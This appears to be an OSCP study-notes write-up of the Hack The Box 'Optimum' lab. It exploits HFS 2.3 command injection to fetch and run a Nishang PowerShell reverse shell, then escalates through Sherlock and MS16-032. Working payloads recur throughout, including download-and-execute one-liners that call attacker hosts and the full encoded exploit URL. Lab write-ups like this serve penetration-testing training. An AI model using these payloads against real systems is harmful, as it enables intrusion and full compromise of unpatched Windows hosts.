O
O
OSCP Notes
Search…
HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock

What I learned:

  • 1 liner
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125:80/ms16-032.ps1')
HTTP Enum:
HttpFileServer 2.3
Searchsploit result:
This exploit worked but IPPSec's walkthrough video does it in better way.
The HFS file server uses rejetto language
HFS: scripting commands - rejetto wiki
The 2.3 version is vulnerable for remote code execution.
We can execute command with following syntax accoding to the wiki page:
exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
Example: {.exec|notepad.}
We can confirm this by typing:
http://10.129.1.127/?search=%00{.exec|ping IP_ADDRESS}
and set up the tcpdump to listen for any command execution: (NEW)
tcpdump -i tun0
This shows that it's exploitable.
Windows have 32bit and 64 bit versions. For file systems:
  1. 1.
    C:\windows\System32
  2. 2.
    c:\Windows\SysWow64 -> this is still 32bit
  3. 3.
    C:\Windows\SysNative -> this is 64 bit
So we will try the 64 bit.
Once confirmed, we can use a toolset called "Nishang" > shells > PoweShellTcp.ps1 and copy it to somewhere else as we need to modify it a bit.
At the end of the script, we need to add one sentence:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.125 -Port 4444
And run nc for that port specified.
Finally, we can download the file on the File Server by typing:
http://10.129.1.127/?search=%00{.exec|c:Windows\SysNative\WindowsPowershell\v1.0\powershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http://10.10.14.125:80/Invoke-PowerShellTcp.ps1%27).}
\
And now we get the usershell!
With this method, we can download a priv esc scripts?
---
Prev Esc
Since we are already running powershell on the server, let's use a native tool called sherlock.
Edit the Sherlock script, and add a method we want to use at the end of the script:
In this case, Find-AllVulns
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125:80/Sherlock.ps1')
We see it's vulnerable to 3 exploits!
  • MS16-032, MS16-034, MS16-135
Try MS16-032
At the end of the script, edit
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"
transfer over the TCP reverse shell Ps1 script (nishang) to the same directory and edit the port to something other the last one and start the python http server to host them
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.188:80/39719.ps1')
Run the nc on the port before running it.
It worked!
Copy link